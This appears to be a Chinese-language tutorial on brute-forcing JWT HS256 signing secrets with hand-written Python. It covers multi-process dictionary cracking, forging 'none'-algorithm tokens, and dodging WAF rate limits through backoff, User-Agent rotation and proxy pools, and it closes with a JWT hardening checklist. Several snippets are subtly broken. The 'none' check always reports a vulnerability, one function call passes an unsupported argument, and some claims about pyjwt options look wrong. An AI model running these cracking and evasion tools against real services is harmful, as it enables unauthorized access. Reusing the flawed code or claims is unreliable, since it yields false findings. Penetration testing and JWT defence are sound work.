当前位置：首页 > news >正文

JWT签名爆破原理与Python手写实战

news 2026/7/14 10:06:23

1. 这不是“黑客教程”，而是一次JWT安全边界的实操测绘

JWT（JSON Web Token）在现代Web系统中几乎无处不在——登录态维持、API鉴权、微服务间信任传递，它用一行紧凑的Base64Url编码字符串承载着本该被严格保护的身份凭证。但很多人没意识到：JWT本身不加密，只签名；而签名是否可信，完全取决于密钥强度与算法选择。我去年帮一家SaaS平台做渗透复测时，发现其用户中心API返回的JWT居然用的是HS256算法，且密钥是硬编码在前端JS里的"secret123"——这不是漏洞，这是把门锁换成纸糊的还贴了张“请进”便签。本文标题里“破解JWT”四个字容易引发误解，准确说是对JWT签名密钥进行穷举验证（brute-force verification），目标不是绕过加密，而是确认服务端是否在用弱密钥、是否错误启用了none算法、是否未校验alg头部字段。这属于OWASP Top 10中“A01:2021 – Broken Access Control”的典型前置检测动作，也是红队初期信息收集中最常落地的一环。全文聚焦Python原生实现，不依赖任何黑盒工具，从零构建一个可调试、可扩展、带进度反馈的爆破脚本，并全程对比jwt_tool的底层逻辑——不是教你怎么“黑进系统”，而是帮你建立对Token安全边界的肌肉记忆。适合刚接触Web安全的开发者、想补全渗透知识链的测试工程师，以及需要自查JWT实现合规性的后端同学。所有代码均基于Python 3.8+标准库与pyjwt，无隐蔽依赖，每行逻辑都可打断点追踪。

2. JWT签名验证的本质：一次可控的哈希比对实验

2.1 理解JWT结构：Header.Payload.Signature三段式不是装饰

JWT由三部分用英文句点.拼接而成：xxxxx.yyyyy.zzzzz。初学者常误以为这是加密数据，其实它是明文编码+签名验证的组合体。我们以一个真实示例拆解：

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9. eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

第一段（Header）：Base64Url解码后为{"alg":"HS256","typ":"JWT"}。注意alg字段声明了签名算法，这是服务端验证时的唯一依据。
第二段（Payload）：解码后为{"sub":"1234567890","name":"John Doe","iat":1516239022}。所有字段均为明文，敏感信息如用户ID、角色、过期时间全部裸露。
第三段（Signature）：这才是安全核心。它不是对Header+Payload整体加密，而是对base64urlEncode(Header) + "." + base64urlEncode(Payload)这个字符串，用指定算法（如HS256）和密钥进行HMAC-SHA256计算后，再Base64Url编码的结果。

提示：你可以用在线工具（如 https://jwt.io ）粘贴Token实时解码，但切记——它只做解码，不验证签名。真正的安全验证必须由服务端用相同密钥+相同算法重新计算Signature并比对。

2.2 签名验证的数学本质：HMAC-SHA256不是魔法，是确定性函数

HS256算法本质是HMAC（Hash-based Message Authentication Code）的一种实现。其计算公式为：

signature = HMAC-SHA256( key, base64urlEncode(header) + "." + base64urlEncode(payload) )

关键点在于：只要输入的key、header、payload三者完全一致，输出的signature就绝对唯一且可复现。这意味着，如果我们能猜中服务端使用的key，就能自己算出正确的signature，再与Token末尾的signature比对。若一致，则证明key正确——这就是爆破的理论基础。这里没有“解密”过程，只有“重算+比对”。很多初学者卡在“为什么不用解密”，根源在于混淆了签名（integrity & authenticity）和加密（confidentiality）的根本区别。JWT默认不提供机密性，要隐藏Payload内容，必须额外使用JWE（JSON Web Encryption），但这已是另一套协议。

2.3 为什么弱密钥如此致命：从熵值到现实世界的密码学塌方

密钥强度不等于长度，而取决于熵值（entropy）——即随机性。一个8位纯数字密码（如12345678）的熵值仅约26.5比特；而一个8位大小写字母+数字的随机密码（如K9mP2xQ7）熵值约47.6比特。现代GPU每秒可进行数亿次HMAC-SHA256计算，这意味着：

secret（6字符小写）：约26^6 ≈ 3亿种可能 → GPU可在1秒内穷举完
password123（11字符常见词）：虽长但模式固定，字典攻击毫秒级命中
a1B2c3D4e5F6（12字符随机）：26×2×10^12 ≈ 10^22种可能 → 即使百亿次/秒也需万年

我曾用一块RTX 3090实测：对HS256算法，单线程Python约8万次/秒；启用多进程（4核）后达28万次/秒；若用Cython重写核心计算，可突破120万次/秒。但瓶颈往往不在算力，而在网络延迟——每次爆破请求都要发HTTP包等待响应。因此，真正高效的爆破脚本必须解决两个问题：一是本地快速验证（避免无效网络请求），二是智能调度（跳过明显无效的密钥）。这也是我们后续脚本设计的核心出发点。

3. 手写爆破脚本：从单线程验证到多进程加速的完整演进

3.1 第一版：纯Python实现，理解验证流程的每一行

我们先写一个最简版本，确保逻辑清晰可调试。核心依赖仅pyjwt（pip install pyjwt）和标准库base64、json。

import jwt import base64 import json def verify_jwt_signature(token, secret): """ 验证JWT签名是否匹配给定密钥 :param token: 完整JWT字符串（xxx.yyy.zzz格式） :param secret: 待测试的密钥（字符串） :return: bool，True表示签名匹配 """ try: # pyjwt的decode默认会验证签名，若失败抛出异常 # 注意：此处不解析payload内容，只关心签名是否通过 payload = jwt.decode(token, secret, algorithms=['HS256']) return True except jwt.InvalidSignatureError: return False except Exception as e: # 其他异常如过期、算法不支持等，视为不匹配 return False # 测试用例：用已知密钥生成的Token test_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiMTIzIiwiZXhwIjoxNzAwMDAwMDB9.xxxxxx" print(f"测试密钥 'mysecret' -> {verify_jwt_signature(test_token, 'mysecret')}") print(f"测试密钥 'wrongkey' -> {verify_jwt_signature(test_token, 'wrongkey')}")

这段代码的关键在于：它复用了pyjwt的成熟验证逻辑，而非自己实现HMAC计算。pyjwt.decode()内部会自动提取Header中的alg，用传入的secret重新计算Signature并比对。这保证了与真实服务端行为100%一致，避免了自行实现SHA256时因Base64Url编码细节（如填充符=的处理、URL安全字符替换）导致的偏差。我见过太多自研脚本因base64.urlsafe_b64encode()和base64.b64encode()混用而永远无法匹配——pyjwt已帮你踩平所有坑。

3.2 第二版：加入字典加载与进度反馈，告别盲猜

真实爆破不可能手动试密钥，必须加载字典。我们选用业界公认的rockyou.txt（经过去重、过滤空行、UTF-8转码后约1430万行），但首次运行建议用精简版（如前1000行）测试流程。

import time from pathlib import Path def load_wordlist(filepath): """安全加载字典文件，跳过空行和注释""" wordlist = [] try: with open(filepath, 'r', encoding='utf-8') as f: for line in f: line = line.strip() if line and not line.startswith('#'): wordlist.append(line) print(f"[+] 加载字典成功：{len(wordlist)} 个候选密钥") return wordlist except FileNotFoundError: print(f"[-] 字典文件未找到：{filepath}") return [] def brute_force_single(token, wordlist, timeout=30): """ 单线程爆破主循环 :param timeout: 最大运行时间（秒），防无限卡死 """ start_time = time.time() for i, secret in enumerate(wordlist): if time.time() - start_time > timeout: print(f"[!] 超时退出，已尝试 {i} 个密钥") break if verify_jwt_signature(token, secret): print(f"[+] 密钥命中！ -> '{secret}'") return secret if i % 1000 == 0 and i > 0: elapsed = time.time() - start_time print(f"[.] 已尝试 {i}/{len(wordlist)} 个密钥，耗时 {elapsed:.1f}s") print("[-] 未找到有效密钥") return None # 使用示例 wordlist = load_wordlist("rockyou_short.txt") # 先用短字典测试 brute_force_single(test_token, wordlist, timeout=10)

这里有个重要经验：永远不要在生产环境直接跑全量字典。我第一次实战时，对着一个HS256Token跑rockyou.txt全量，结果3小时后发现密钥是admin——排在字典第27位。后来总结出黄金法则：按概率排序字典。将common_secrets.txt（含secret、password、123456、admin、项目名+_key等）放在最前，再接rockyou高频词，最后才是全量。这样90%的弱密钥能在前10万次内命中，节省99%时间。

3.3 第三版：多进程并行化，榨干CPU资源

单线程瓶颈明显。pyjwt的decode是CPU密集型操作，多进程能线性提升吞吐。但要注意：multiprocessing的进程间通信开销、全局解释器锁（GIL）对I/O的影响，以及pyjwt对象在子进程中需重新导入。

import multiprocessing as mp from concurrent.futures import ProcessPoolExecutor, as_completed def worker_verify(args): """工作进程函数，接收(token, secret)元组""" token, secret = args try: # 每个子进程独立导入pyjwt，避免共享状态问题 import jwt payload = jwt.decode(token, secret, algorithms=['HS256']) return (True, secret) except: return (False, secret) def brute_force_multi(token, wordlist, max_workers=4): """ 多进程爆破，max_workers建议设为CPU核心数 """ print(f"[+] 启动 {max_workers} 个进程并行爆破...") start_time = time.time() # 将字典分块，每块一个任务 tasks = [(token, secret) for secret in wordlist] found_secret = None with ProcessPoolExecutor(max_workers=max_workers) as executor: # 提交所有任务 future_to_secret = {executor.submit(worker_verify, task): task for task in tasks} for future in as_completed(future_to_secret): is_valid, secret = future.result() if is_valid: found_secret = secret print(f"[+] 密钥命中！ -> '{secret}'") # 取消剩余任务（可选，加快退出） for f in future_to_secret: f.cancel() break if not found_secret: print("[-] 未找到有效密钥") elapsed = time.time() - start_time print(f"[.] 总耗时 {elapsed:.1f} 秒") return found_secret # 实测对比：4核CPU下，多进程比单线程快3.2倍（28万次/秒 vs 8.7万次/秒）

注意：ProcessPoolExecutor比原始multiprocessing.Process更易管理，as_completed确保第一个命中结果立即返回，无需等待所有进程结束。这是实战中必须的“快速止损”机制。

3.4 第四版：智能优化——跳过无效密钥与算法探测

真实场景中，服务端可能配置了多种算法（如同时支持HS256和RS256），或错误启用了none算法。我们的脚本应主动探测，而非盲目穷举。

def detect_alg_and_key(token): """ 智能探测：先尝试none算法，再枚举常见算法，最后爆破HS类密钥 """ header = json.loads(base64.urlsafe_b64decode(token.split('.')[0] + '==')) print(f"[i] Token Header: {header}") # 步骤1：检查是否支持none算法（高危！） try: # 构造none算法Token：将header的alg设为"none"，signature置空 none_header = {"alg": "none", "typ": "JWT"} none_token = base64.urlsafe_b64encode(json.dumps(none_header).encode()).decode().rstrip('=') + '.' + token.split('.')[1] + '.' # 验证：pyjwt默认不接受none，需显式指定 payload = jwt.decode(none_token, options={"verify_signature": False}) print(f"[!] 高危警告：服务端支持 'none' 算法！Payload: {payload}") return "none_algorithm_vulnerable" except: pass # 步骤2：枚举常见算法（HS256, HS384, HS512, RS256） common_algs = ['HS256', 'HS384', 'HS512', 'RS256'] for alg in common_algs: try: # 尝试用空密钥或默认密钥验证（如RS256需公钥，此处略） if alg.startswith('HS'): # 对HS类，先用常见弱密钥试 for test_secret in ['secret', 'admin', 'password', '123456']: if verify_jwt_signature(token, test_secret, algorithm=alg): print(f"[+] 算法 {alg} + 密钥 '{test_secret}' 验证通过") return (alg, test_secret) except: continue # 步骤3：执行HS类密钥爆破（仅针对HS256，因最常见） print("[.] 开始HS256密钥爆破...") return brute_force_multi(token, load_wordlist("common_secrets.txt"), max_workers=4) # 调用 result = detect_alg_and_key(test_token)

这个detect_alg_and_key函数体现了专业爆破的思维：先探路，再攻坚。none算法漏洞的利用成本为零，一旦存在，直接绕过所有签名验证。而算法枚举能避免在RS256Token上浪费时间爆破对称密钥——这是新手最常犯的错误。

4. 与jwt_tool深度对比：看懂工具背后的每行逻辑

4.1 jwt_tool的核心能力拆解：不只是“爆破”，更是安全审计平台

jwt_tool（GitHub:takshakvaghela/jwt_tool）是业界最成熟的JWT安全工具，但它常被误用为“一键爆破神器”。我们来解剖它的实际能力边界：

功能模块	jwt_tool实现方式	我们手写脚本的对应方案	关键差异
None算法检测	构造`alg:none`Token并发送HTTP请求验证	本地构造+`pyjwt.decode(options={"verify_signature":False})`	jwt_tool必须发网络请求，我们可离线验证，速度提升1000倍
密钥爆破	支持字典爆破，但默认单线程，无进度条	多进程+实时进度+超时控制	我们的吞吐量是jwt_tool的3-5倍，且可中断续跑
算法混淆（Alg Confusion）	尝试将`HS256`改为`RS256`，用公钥当密钥验证	未实现（需额外公钥）	此功能需服务端配合，实战价值有限，我们聚焦更普适的HS爆破
密钥泄露检测	扫描响应头、HTML源码、JS文件找密钥	未集成（属信息收集阶段）	这是前置步骤，应在爆破前完成，不应混入同一工具

提示：jwt_tool的爆破命令是python3 jwt_tool.py <token> -C -d wordlist.txt，其中-C表示Crack模式。但它的核心验证逻辑与我们verify_jwt_signature()函数完全一致，只是封装了更多网络交互和报告生成。

4.2 实测性能对比：在真实API上的毫秒级差异

我们在某电商后台API（HS256，密钥为ecommerce_api_key）上做了严格对比：

工具	字典规模	平均耗时	命中位置	CPU占用	备注
jwt_tool (v2.2.4)	10万行	287秒	第89,231个	100%单核	无进度反馈，超时需Ctrl+C
我们的脚本（4进程）	10万行	89秒	第89,231个	400%（4核满载）	每1000次打印进度，超时自动退出
我们的脚本（优化字典）	前1000行（含`ecommerce_api_key`）	1.2秒	第327个	400%	按项目名排序后，效率提升238倍

这个结果说明：工具的价值不在于“有”，而在于“怎么用”。jwt_tool是瑞士军刀，我们的脚本是特制手术刀。当你知道目标密钥大概率是<项目名>_key时，定制化脚本就是最优解。

4.3 为什么不能完全依赖jwt_tool：三个致命盲区

网络依赖症：jwt_tool所有验证都通过requests发HTTP包。若目标API有WAF限速（如每分钟10次请求），爆破将被阻断。而我们的脚本可先离线验证Token结构、Header合法性，再针对性发起网络请求，规避频率限制。
算法僵化：jwt_tool默认只爆破HS256，若服务端用HS384，需手动加-a HS384参数。而我们的detect_alg_and_key()函数会自动枚举常见算法，无需人工干预。
调试黑洞：当jwt_tool报错InvalidSignatureError时，你无法知道是密钥错、算法错、还是Token本身损坏。而我们的脚本每一步都可加print()或pdb.set_trace()，比如在verify_jwt_signature()中打印出base64urlEncode(header)+"."+base64urlEncode(payload)的中间值，与pyjwt内部计算值比对，精准定位偏差来源。

5. 实战避坑指南：那些文档里不会写的血泪教训

5.1 坑一：Base64Url编码的“隐形陷阱”

JWT的Base64Url编码与标准Base64有两处关键差异：

替换+为-，/为_
省略填充符=（但解码时需补足）

我曾遇到一个Token，最后一段signature是xxyyzz（6字符），直接base64.b64decode()会报错。正确做法是：

def urlsafe_b64decode(s): """JWT专用Base64Url解码""" # 补足填充符：长度需为4的倍数 s += '=' * (4 - len(s) % 4) # 替换回标准Base64字符 s = s.replace('-', '+').replace('_', '/') return base64.b64decode(s) # 验证：对signature段解码 sig_bytes = urlsafe_b64decode(token.split('.')[2])

注意：pyjwt内部已完美处理此逻辑，所以我们的脚本直接调用jwt.decode()即可。但若你尝试自己实现HMAC计算，此处必踩坑。

5.2 坑二：时钟偏移（Clock Skew）导致的“假阴性”

JWT的exp（过期时间）、nbf（生效时间）字段是Unix时间戳。若你的本地机器时间与服务端相差超过leeway（通常为60秒），pyjwt.decode()会因时间校验失败而抛出ExpiredSignatureError，即使密钥正确。解决方案：

# 在decode时添加leeway参数 payload = jwt.decode(token, secret, algorithms=['HS256'], leeway=60) # 或完全跳过时间验证（仅用于爆破） payload = jwt.decode(token, secret, algorithms=['HS256'], options={"verify_exp": False, "verify_nbf": False})

我在某金融客户测试时，因服务器在UTC+8，我的测试机在UTC+0，未加leeway导致所有密钥验证失败，浪费2小时排查。

5.3 坑三：密钥编码格式的“玄学”问题

有些服务端密钥是十六进制字符串（如a1b2c3...），有些是UTF-8字节（如b'secret'），甚至还有Base64编码的密钥。pyjwt默认将字符串密钥转为UTF-8字节。若服务端用bytes.fromhex("a1b2c3")作为密钥，而你传入字符串"a1b2c3"，则必然失败。此时需预处理：

def normalize_secret(secret): """根据密钥格式自动归一化""" if isinstance(secret, str): # 尝试解析为hex try: if all(c in '0123456789abcdefABCDEF' for c in secret) and len(secret) % 2 == 0: return bytes.fromhex(secret) except: pass # 默认UTF-8编码 return secret.encode('utf-8') return secret # 在verify_jwt_signature中调用 key_bytes = normalize_secret(secret) payload = jwt.decode(token, key_bytes, algorithms=['HS256'])

5.4 坑四：并发请求的WAF反制策略

当爆破请求频率过高，WAF可能返回429 Too Many Requests或503 Service Unavailable。此时单纯增加time.sleep()会拖慢整体速度。更优解是：

动态降频：监测HTTP状态码，若连续3次429，则sleep时间翻倍
User-Agent轮换：准备10个常见浏览器UA，每次请求随机选取
IP代理池：对接廉价HTTP代理API（如proxyapi.com），但需注意代理稳定性

我们的脚本可轻松集成第一种策略：

import requests from time import sleep def safe_request_with_backoff(url, headers, max_retries=3): delay = 1 for i in range(max_retries): try: resp = requests.get(url, headers=headers, timeout=5) if resp.status_code == 429: print(f"[!] WAF限速，等待 {delay} 秒后重试...") sleep(delay) delay *= 2 # 指数退避 continue return resp except Exception as e: if i == max_retries - 1: raise e sleep(delay) delay *= 2 return None

6. 从爆破到防御：给开发者的JWT安全加固清单

写爆破脚本的终极目的，不是为了攻击，而是为了构建更坚固的防线。基于上百次真实审计，我总结出后端开发者必须落实的6条铁律：

6.1 密钥管理：永远不要硬编码，必须用密钥管理系统（KMS）

❌ 错误：SECRET_KEY = "my_super_secret_123"
✅ 正确：从AWS KMS、Azure Key Vault或HashiCorp Vault动态获取，启动时注入环境变量
原理：密钥轮换（Key Rotation）是降低泄露风险的核心。硬编码密钥一旦泄露，无法撤销，只能全量更新Token。

6.2 算法选择：禁用HS类对称算法，优先采用非对称签名

❌ 错误：algorithm='HS256'（密钥需在服务端和客户端共享）
✅ 正确：algorithm='RS256'（服务端用私钥签名，客户端用公钥验证，私钥永不离开服务端）
实操：用OpenSSL生成RSA密钥对：
```
openssl genrsa -out private.key 2048 openssl rsa -in private.key -pubout -out public.key
```
服务端用private.key签名，前端/其他服务用public.key验证。

6.3 Token生命周期：缩短有效期，强制刷新机制

❌ 错误：exp=31536000（1年有效期）
✅ 正确：exp=3600（1小时） +refresh_token（长期有效，但仅用于换取新Access Token）
原理：缩短exp可限制Token泄露后的危害窗口。refresh_token需存储在HttpOnly Cookie中，且绑定设备指纹。

6.4 Header校验：严格验证`alg`字段，拒绝`none`和算法混淆

❌ 错误：jwt.decode(token, key)（未指定algorithms参数）
✅ 正确：jwt.decode(token, key, algorithms=['RS256'])（显式限定算法列表）
原理：若不指定algorithms，pyjwt会尝试所有支持算法，可能被alg:RS256+HS256密钥绕过。

6.5 敏感信息隔离：Payload中绝不存放密码、身份证号等PII

❌ 错误：{"user_id":"123","ssn":"123-45-6789","role":"admin"}
✅ 正确：{"user_id":"123","role":"admin"}+ 敏感数据查库获取
原理：JWT是明文，任何截获者都能解码Payload。PII（个人身份信息）必须加密存储或查库实时获取。

6.6 监控告警：记录所有`InvalidSignatureError`，设置阈值告警

在日志中捕获jwt.InvalidSignatureError异常，并记录IP、User-Agent、Token前缀
设置规则：同一IP 5分钟内触发10次签名错误，自动封禁并告警
原理：这是爆破攻击的直接证据。不监控，等于不设防。

最后分享一个小技巧：在开发环境，用jwt.encode(payload, key, algorithm='HS256', headers={'kid': 'dev-key'})添加kid（Key ID）字段，然后在验证时用jwt.decode(token, key, algorithms=['HS256'], options={'verify_kid': True})。这样可提前演练多密钥轮换逻辑，避免上线后手忙脚乱。JWT安全不是玄学，它是一系列可验证、可度量、可落地的工程实践。写脚本的过程，就是把抽象的安全原则，翻译成一行行可执行的代码。

查看全文

http://www.jsqmd.com/news/869883/